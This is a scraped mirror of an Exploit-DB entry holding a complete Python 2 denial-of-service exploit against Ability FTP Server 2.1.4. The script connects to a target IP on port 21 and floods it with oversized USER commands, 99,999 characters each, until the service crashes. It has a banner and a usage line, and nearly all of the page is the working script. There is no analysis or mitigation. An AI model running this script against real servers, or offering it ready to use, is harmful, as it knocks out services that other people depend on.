Ability FTP Server 2.1.4 – ‘afsmain.exe’ ‘USER’ Remote Denial of Service - 体验盒子

作者： St0rn

日期： 2015-08-15

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/37775/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

#!/usr/bin/env python

#

# Exploit Title: Ability FTP Server afsmain.exe USER Command Remote Dos

# Date: 2015-08-15

# Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com>

# Twitter: st0rnpentest

#

# Vendor Homepage: www.codecrafters.com

# Software Link: http://www.codecrafters.com/AbilityFTPServer

# Version: 2.1.4

# Tested on: Windows 7

#

import socket

import sys

import os

def clear():

os.system("cls")

def banner():

print "############################################".center(80)

print "#Ability FTP Server DoS PoC#".center(80)

print "# Author: St0rn#".center(80)

print "#<fabien[at]anbu-pentest[dot]com>#".center(80)

print "############################################".center(80)

def createconn(ip):

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

s.connect((ip,21))

except:

print "\n"

print "[+] Server Down!".center(80)

sys.exit(0)

return s

def crash(sock):

try:

while 1:

sock.send('USER '+'a'*99999)

sys.stdout.write('.')

except:

sock.close()

############### Main ###############

clear()

banner()

if len(sys.argv)==2:

print "\n"

print "Waiting 2 or 3 minutes before crash".center(80)

print "(The server can be run without afsloader.exe)".center(80)

while 1:

s=createconn(sys.argv[1])

crash(s)

else:

print "\n"

print "Usage: AftpDos.py [Server IP]".center(80)

sys.exit(0)